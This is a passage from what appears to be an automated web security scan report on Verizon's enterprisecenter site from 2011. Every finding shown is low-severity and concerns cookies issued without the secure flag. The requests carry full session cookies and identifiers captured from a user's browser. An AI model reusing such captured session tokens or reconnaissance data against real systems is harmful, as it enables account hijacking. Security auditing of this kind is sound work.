Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0

6.9. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/javascript/selfreg.js HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: application/x-javascript
Last-Modified: Sun, 17 Jul 2011 07:10:54 GMT
ETag: W/"20e6-4e228afe"
Vary: accept-encoding
Cache-Control: private, max-age=28800
Date: Mon, 05 Sep 2011 22:22:43 GMT
Content-Length: 8422
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

function change(id, newClass)
{
       var theElement = document.getElementById(id);
       theElement.className = newClass;
}

function checkUserID()
{
       var userID = document.getElementById('userID');
       //a
...[SNIP]...

6.10. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0

6.11. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1145
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "479-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a..d..................................wwwfffUUUDDD333"""................................................,......d..... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~...
...[SNIP]...

6.12. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 841
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "349-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

GIF89a..G............................wwwfffUUUDDD333"""......................................................!.......,......G.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.
...[SNIP]...

6.13. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 2234
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "8ba-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a..d..............55.((TTT...888xxx.......gg...'''.XXGGG.............DD.......ss.....................bbb..........................LL.......||......mmm...........................................
...[SNIP]...

6.14. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1435
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "59b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7185
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

GIF89ax.G....677...]^^..................._W.zs................92.......................................|||...,....x.G.....%.di.h..l..p,..d.x..t....pH,....r.l:.PT ......D2.B.Z.Q.@......&H.....NN
....p.
...[SNIP]...

6.15. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 51
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "33-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a..
................!.......,......
....L.)S.;

6.16. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 115
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "73-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a
.
....................................................!.......,....
.
... P.I..U.....Q.^@n.@.B..H..C= .!...;

6.17. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
